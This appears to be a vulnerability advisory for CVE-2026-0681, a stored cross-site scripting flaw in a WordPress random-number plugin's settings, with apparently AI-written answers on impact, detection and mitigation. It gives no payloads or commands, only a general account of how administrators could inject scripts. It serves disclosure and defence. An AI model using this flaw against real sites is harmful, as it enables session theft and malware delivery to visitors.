CVE-2026-0681
Stored XSS in WordPress Extended RNG Plugin Settings
Publication date: 2026-02-04
Last updated on: 2026-02-04
Assigner: Wordfence
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| wordfence | extended_random_number_generator | to 1.1 (inc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
The Extended Random Number Generator plugin for WordPress is vulnerable to Stored Cross-Site Scripting (XSS) via the plugin settings in all versions up to and including 1.1. This vulnerability arises due to insufficient input sanitization and output escaping.
Authenticated attackers with administrator-level access can exploit this vulnerability to inject arbitrary web scripts into pages. These scripts will execute whenever a user accesses the injected page.
This vulnerability only affects multi-site WordPress installations and installations where the unfiltered_html capability has been disabled.
How can this vulnerability impact me? :
This vulnerability can allow an attacker with administrator access to inject malicious scripts into the website's pages. These scripts can execute in the context of users visiting the affected pages.
Potential impacts include theft of user credentials, session hijacking, defacement of the website, or distribution of malware to visitors.
Because the vulnerability requires administrator-level access and affects only multi-site or restricted HTML installations, the risk is somewhat limited but still significant in those environments.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
I don't know
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability involves Stored Cross-Site Scripting (XSS) in the Extended Random Number Generator WordPress plugin settings, exploitable by authenticated administrators. Detection typically requires inspecting the plugin settings for injected scripts or monitoring HTTP responses for unexpected script content in pages served by multi-site installations or sites with unfiltered_html disabled.
Since the vulnerability is related to stored scripts in plugin settings, network-level detection commands are not straightforward. Instead, manual or automated inspection of the WordPress database or plugin settings pages for suspicious script tags or payloads is recommended.
No specific detection commands are provided in the available resources.
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include updating the Extended Random Number Generator plugin to a version later than 1.1 where the vulnerability is fixed, if such a version is available.
If an update is not available, restrict administrator access to trusted users only, especially on multi-site installations or sites where unfiltered_html is disabled, to prevent exploitation.
Additionally, review and sanitize plugin settings to remove any injected scripts and monitor for suspicious activity.